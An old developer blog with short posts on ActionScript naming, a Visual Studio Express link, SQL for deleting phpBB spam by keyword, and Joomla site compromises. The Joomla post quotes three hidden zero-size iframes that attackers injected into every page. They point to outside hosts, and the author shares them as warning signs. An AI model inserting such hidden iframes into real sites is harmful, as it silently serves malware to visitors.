Monday, November 02, 2009
Actionscript Suffixes
When in doubt about your actionscript naming conventions, do a google search for Actionscript Suffixes.
Joomla vulnerabilities I've seen
This bit of code was inserted to the bottom of every page on the server.
<iframe src="http://davtraff.com/lib/index.php" width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>as part of the remedy, you and I should look into sftp rather than plain ftp as one possible loophole to cover. See http://www.stopbadware.org/home/security for more. Here is another block of iframe to watch out for:
<iframe src="http://davtraff.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>And another one:
<iframe src="http://google-analyze.org/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Sunday, June 18, 2006
Upgrade Your Game - Visual Studio Express
Upgrade Your Game - Visual Studio Express: "If you want to take your love for gaming or developing to the next level by learning how to build arcade games, you've come to the right place. Unleash the arcade in your PC with free downloadable resources tailored for either the beginner or the intermediate developer:"
Tuesday, June 13, 2006
SQL TO CLEAN UP PHPBB SPAM
This will get you most of the way through deletion of spam entries in your PHPBB TABLE...
(replace ez_ with the prefix you use for your PHPBB.)
Delete from ez_posts_text where post_text like '%Proxy%' OR post_text like '%radiospace%' OR post_text like '%ringtonesring%' OR post_text like '%credit-card%' OR post_text like '%sourcerecipes%' OR post_text like '%diamonds-source%' or post_text like '%valtrex%' OR post_text like '%poker%' OR post_text like '%real estate%' OR post_text like '%ultram%' OR post_text like '%cialis%' OR post_text like '%cheap%' OR post_text like '%dating%' OR post_text like '%furniture%' OR POST_TEXT LIKE '%unishop.info%'; -- Select * from ez_posts_text ;
Wednesday, March 15, 2006
Subscribe to:
Posts (Atom)